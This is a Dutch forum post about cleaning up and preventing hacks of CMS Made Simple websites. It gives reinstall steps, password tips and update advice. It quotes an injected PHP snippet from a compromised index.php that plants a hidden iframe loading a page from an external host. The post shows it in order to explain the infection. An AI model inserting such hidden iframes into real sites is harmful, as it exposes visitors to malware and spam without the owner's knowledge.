Kijk je in de broncode van de CMS bestanden, dan zie je vaak vreemde code tussen de normale code staan. Bijvoorbeeld in de root index.php:
Code: Select all
else if (file_exists(TMP_CACHE_LOCATION.'/SITEDOWN'))
{
echo "< html>< head><title>Maintenance</title></head>< body>< iframe src="http;//abcde,ru:8080/index.php" width=157 height=142 style="visibility: hidden">< /iframe><p>Site down for maintenance.</p>< /body>< /html>";
exit;
}
Het zet een, voor het oog niet zichtbaar iframe op je website. Maar de zoekmachines zien hem wel, bijvoorbeeld een manier om meer verwijzingen naar een site te krijgen en een hogere PageRank te genereren. Of het wordt gebruikt om malware of spam te verzenden, enz. enz.
Ergens op jouw server staan één of meerdere scripts (PHP-bestandjes) die de iFrames in jouw CMSMS bestanden zet.
Bekijk maar eens wat bestanden op de server, let hierbij op de laatste wijzigingsdatum. Over het algemeen zullen de bestanden dezelfde datum hebben: datum installatie of datum upgrade.
Veel van de dummy index.html files blijken vaak gewijzigd.
Raadpleeg in ieder geval de provider, zij kunnen (mogelijk) preventieve acties ondernemen.
Wijzig FTP-inloggegevens met sterkte wachtwoorden, bijv. "fhSDt34&FGyQ" of iets dergelijks, maar zeker niet zoiets als "henk01".
Voor de zekerheid kun je ook altijd de Admin inloggegevens nog even wijzigen. Al zal dat waarschijnlijk niet nodig zijn.
Door het maken van een back-up op een PC met een goed Internet Security pakket zou je deze niet-CMSMS bestanden wel kunnen vinden en verwijderen.
Maar het vinden van alle aangepaste/beschadigde bestanden is ondoenlijk...
Een CMSMS pakket bestaat uit duizenden bestanden.
Heb een aantal van deze acties op het forum bij de hand gehad.
De conclusie hier was dat er eigenlijk maar twee opties zijn.
1. Terugzetten van een back-up set die niet gehackt is, maar hierbij is het probleem: hoe weet je dit zeker? Heb een site gezien die al jaren geplaagd werd met dit soort zaken, stiekem zat er toch nog ergens een fout bestandje verstopt...
2. Met een schone lei beginnen...
- Zorg voor een goede back-up van de huidige bestanden en database!
- Maak een kopie van de Systeem Informatie voor een overzicht van de geïnstalleerde modules.
- Verwijder alle bestanden van de server, maar laat de database gewoon bestaan!
- Installeer een nieuwe CMSMS versie (die ook geïnstalleerd was) mét de nog bestaande database!
Maar let goed op wat je doet tijdens het installeren, kies NIET voor het aanmaken van tabellen en standaard inhoud in de database in stap 5. Anders wordt alles overschreven.
Let goed op wat je doet...
- Download en unzip de gebruikte modules naar de eigen pc, en upload deze daarna via FTP terug op de webserver.
Na het nieuw aanmaken van het CMS, kun je alle afbeeldingen e.d. terugplaatsen.
Doe dit handmatig en eigenlijk stuk voor stuk. Volledige mappen terugzetten heeft als risico dat er nog een fout bestandje in kan zitten en dan ben je weer terug bij af...
Alle bestanden zijn nu nieuw en de site kan weer zonder enige risico op gehackte files verder draaien. :)
Hoe kun je een gehackte website voorkomen?
100% Garantie krijgt niemand, maar je kunt wel je best doen...
- Goede, betrouwbare host. Goedkoop kan wel eens duurkoop zijn.
- Sterke FTP loginnaam en wachtwoord (Tip: http://howsecureismypassword.net/)
- Zorg voor een up-to-date virusscanner op je eigen PC. Een virus kan vanuit je PC meeliften als je bestanden upload.
- Regelmatig back-ups van de website maken. Door het maken van deze back-up scant de virusscanner de bestanden op de server en zal een eventuele hack snel worden gedetecteerd en de schade minimaal blijven.
- Gebruik de laatste versies van CMS Made Simple en de modules. Upgraden dus!
Succes,
Rolf